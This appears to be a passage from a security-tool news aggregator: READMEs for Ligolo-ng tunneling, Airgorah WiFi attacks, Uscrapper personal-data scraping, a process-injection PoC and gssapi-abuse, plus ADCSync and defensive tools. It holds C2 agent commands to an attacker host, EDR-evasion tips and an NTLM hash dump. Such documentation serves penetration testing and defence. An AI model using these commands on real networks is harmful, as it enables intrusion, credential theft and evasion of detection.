Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng Β» session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] Β» ifconfig 
[...]
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Interface 3 β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Name β”‚ wlp3s0 β”‚
β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe β”‚
β”‚ MTU β”‚ 1500 β”‚
β”‚ Flags β”‚ up|broadcast|multicast β”‚
β”‚ IPv4 Address β”‚ 192.168.0.30/24 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx MΓ©t MTU Γ‰tat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] Β» listener_list 
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Active listeners β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€ ───────────────────┬─────────────────────────
β”‚ # β”‚ AGENT β”‚ AGENT LISTENER ADDRESS β”‚ PROXY REDIRECT ADDRESS β”‚
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€& #9508;
β”‚ 0 β”‚ nchatelain@nworkstation β”‚ 0.0.0.0:1234 β”‚ 127.0.0.1:4321 β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

Caveats

Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.

Todo

  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.

Credits

  • Nicolas Chatelain <nicolas -at- chatelain.me>


Antisquat - Leverages AI Techniques Such As NLP, ChatGPT And More To Empower Detection Of Typosquatting And Phishing Domains

By: Zion3R


AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.


How to use

  • Clone the project via git clone https://github.com/redhuntlabs/antisquat.
  • Install all dependencies by typing pip install -r requirements.txt.
  • Get a ChatGPT API key at https://platform.openai.com/account/api-keys
  • Create a file named .openai-key and paste your chatgpt api key in there.
  • (Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your godaddy api key in there.
  • Create a file named β€˜domains.txt’. Type in a line-separated list of domains you’d like to scan.
  • (Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you’d like to ignore. Regular expressions are supported.
  • Run antisquat using python3.8 antisquat.py domains.txt

Examples:

Let’s say you’d like to run antisquat on "flipkart.com".

Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.

AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.

Test case:

A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py

Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.

If you'd like to know more about the tool, make sure to check out our blog.

Acknowledgements

To know more about our Attack Surface Management platform, check out NVADR.



Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

By: Zion3R


Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

⭐ Don't forget to put a star if you like the project!

Legal

Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.

Requirements

This software only works on linux and requires root privileges to run.

You will also need a wireless network card that supports monitor mode and packet injection.

Installation

The installation instructions are available here.

Usage

The documentation about the usage of the application is available here.

License

This project is released under MIT license.

Contributing

If you have any question about the usage of the application, do not hesitate to open a discussion

If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request



Rayder - A Lightweight Tool For Orchestrating And Organizing Your Bug Hunting Recon / Pentesting Command-Line Workflows

By: Zion3R


Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.


Installation

To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:

go install github.com/devanshbatham/rayder@v0.0.4

Usage

Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:

rayder -w path/to/workflow.yaml

Workflow Configuration

A workflow is defined in a YAML file with the following structure:

vars:
VAR_NAME: value
# Add more variables...

parallel: true|false
modules:
- name: task-name
cmds:
- command-1
- command-2
# Add more commands...
silent: true|false
# Add more modules...

Using Variables in Workflows

Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).

Defining Variables

To define variables, add them to the vars section of your workflow YAML file:

vars:
VAR_NAME: value
ANOTHER_VAR: another_value
# Add more variables...

Referencing Variables in Commands

You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:

modules:
- name: example-task
cmds:
- echo "Output directory {{OUTPUT_DIR}}"

Supplying Variables via the Command Line

You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:

rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value

If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.

Remember that variables supplied via the command line will override the default values defined in the YAML configuration.

Example

Example 1:

Here's an example of how you can define, reference, and supply variables in your workflow configuration:

vars:
ORG: "example.org"
OUTPUT_DIR: "results"

modules:
- name: example-task
cmds:
- echo "Organization {{ORG}}"
- echo "Output directory {{OUTPUT_DIR}}"

When executing the workflow, you can provide values for ORG and OUTPUT_DIR via the command line like this:

rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir

This will override the default values and use the provided values for these variables.

Example 2:

Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:

vars:
ORG: "Acme, Inc"
OUTPUT_DIR: "results-dir"

parallel: false
modules:
- name: reverse-whois
silent: false
cmds:
- mkdir -p {{OUTPUT_DIR}}
- revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt

- name: finding-subdomains
cmds:
- xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
silent: false

- name: cleaning-subdomains
cmds:
- cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
- rm *.out
silent: true

- name: resolving-subdomains
cmds:
- cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
silent: false

- name: checking-alive-subdomains
cmds:
- cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 0 -o {{OUTPUT_DIR}}/alive-subdomains.txt
silent: false

To execute the above workflow, run the following command:

rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results

Parallel Execution

The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.

Workflows

Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!

Inspiration

Inspiration of this project comes from Awesome taskfile project.



Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

By: Zion3R


Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.


Extracted Details:

Uscrapper extracts the following details from the provided website:

  • Email Addresses: Displays email addresses found on the website.
  • Social Media Links: Displays links to various social media platforms found on the website.
  • Author Names: Displays the names of authors associated with the website.
  • Geolocations: Displays geolocation information associated with the website.
  • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.

Whats New?:

Uscrapper 2.0:

  • Introduced multiple modules to bypass anti-webscrapping techniques.
  • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
  • Implemented Multithreading to make these processes faster.

Installation Steps:

git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/ 
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

Usage:

To run Uscrapper, use the following command-line syntax:

python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


Arguments:

  • -h, --help: Show the help message and exit.
  • -u URL, --url URL: Specify the URL of the website to extract details from.
  • -c INT, --crawl INT: Specify the number of links to crawl
  • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
  • -O, --generate-report: Generate a report file containing the extracted details.
  • -ns, --nonstrict: Display non-strict usernames during extraction.

Note:

  • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

  • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

  • To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.

Contribution:

Want a new feature to be added?

  • Make a pull request with all the necessary details and it will be merged after a review.
  • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


DllNotificationInjection - A POC Of A New "Threadless" Process Injection Technique That Works By Utilizing The Concept Of DLL Notification Callbacks In Local And Remote Processes

By: Zion3R

DllNotificationInection is a POC of a new β€œthreadless” process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.

An accompanying blog post with more details is available here:

https://shorsec.io/blog/dll-notification-injection/


How It Works?

DllNotificationInection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts it manually into the remote LdrpDllNotificationList by patching of the List.Flink of the list head and the List.Blink of the first entry (now second) of the list.

Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.

After manually registering our new entry in the remote process we just need to wait for the remote process to trigger our DLL Notification Callback by loading or unloading some DLL. This obviously doesn't happen in every process regularly so prior work finding suitable candidates for this injection technique is needed. From my brief searching, it seems that RuntimeBroker.exe and explorer.exe are suitable candidates for this, although I encourage you to find others as well.

OPSEC Notes

This is a POC. In order for this to be OPSEC safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One also might want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower level APIs and use Indirect Syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes or even go the extra mile and modify the trampoline shellcode to suit your needs, or at least change the default hash values in @C5pider's ShellcodeTemplate project which was utilized to create the trampoline shellcode.

Acknowledgments



Gssapi-Abuse - A Tool For Enumerating Potential Hosts That Are Open To GSSAPI Abuse Within Active Directory Networks

By: Zion3R


gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks

The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active Directory that offer GSSAPI authentication over SSH.

The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.


Prerequisites

gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.

Windows

On Windows hosts, the MIT Kerberos software should be installed in addition to the python modules listed in requirements.txt, this can be obtained at the MIT Kerberos Distribution Page. Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf

Linux

The libkrb5-dev package needs to be installed prior to installing python requirements

All

Once the requirements are satisfied, you can install the python dependencies via pip/pip3 tool

pip install -r requirements.txt

Enumeration Mode

The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.

Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.

Example

python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH

DNS Mode

DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently dns mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targetting a specific domain controller, e.g. DNS/dc1.victim.local.

Examples

Adding a DNS A record for host ahost.ad.ginge.com

python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding A record for target ahost using data 192.168.128.50
[+] Applied 1 updates successfully

Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a ., this is important or the record becomes a relative record to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones to A records.

python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
[+] Applied 1 updates successfully

Forward and reverse DNS lookup results after execution

nslookup ahost.ad.ginge.com
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1

Name: ahost.ad.ginge.com
Address: 192.168.128.50
nslookup 192.168.128.50
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1

Name: ahost.ad.ginge.com
Address: 192.168.128.50


ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

By: Zion3R


This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.


This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/

Grabbing user certs:
100%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LO CAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

Introduction

ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.

Installation

git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

Usage

To use this tool we need the following things:

  1. Valid Domain Credentials
  2. A user list from a bloodhound dump that will be passed in.
  3. A template vulnerable to ESC1 (Found with Certipy find)
# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/

Usage: adcsync.py [OPTIONS]

Options:
-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of th e target machine [required]
--help Show this message and exit.

TODO

  • Support alternative authentication methods such as NTLM hashes and ccache files
  • Automatically run "certipy find" to find and grab templates vulnerable to ESC1
  • Add jitter and sleep options to avoid detection
  • Add type validation for all variables

Acknowledgements

  • puzzlepeaches: Telling me to hurry up and write this
  • ly4k: For Certipy
  • WazeHell: For the script to set up the vulnerable AD environment used for testing


FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of Blo odHound In A More Automated Fashion

By: Zion3R


FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.

One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.

One of the hardest releationships to gather for BloodHound is the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.

This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.

Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.


Other examples where FalconHound can be used:

  • Adding, removing or timing out sessions in the graph, based on logon and logoff events.
  • Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
  • Adding CVE information and whether there is a public exploit available to the graph.
  • All kinds of Azure activities.
  • Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
  • Adding new users, groups and computers to the graph.
  • Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.

The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.

A blog detailing more on why we developed it and some use case examples can be found here

Index:

Supported data sources and targets

FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.

Currently, FalconHound supports the following data sources and or targets:

  • Azure Sentinel
  • Azure Sentinel Watchlists
  • Splunk
  • Microsoft Defender for Endpoint
  • Neo4j
  • MS Graph API (early stage)
  • CSV files

Additional data sources and targets are planned for the future.

At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.


Installation

Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.

Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to creat all crededentials can be found here.

The recommened way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.

Requirements

  • BloodHound, or at least the Neo4j database for now.
  • A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
  • Credentials for each endpoint you want to talk to, with the required permissions.

Configuration

FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.


Usage

Default run

To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.

./falconhound -go

List all enabled actions

To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.

./falconhound -actionlist -go

Run with a select set of actions

To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.

./falconhound -ids action1,action2,action3 -go

Run with a different config file

By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.

./falconhound -go -config /path/to/config.yml

Run with a different actions folder

By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.

./falconhound -go -actions-dir /path/to/actions

Run with credentials from a keyvault

By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.

./falconhound -go -keyvault

Actions

Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.

Action folder structure

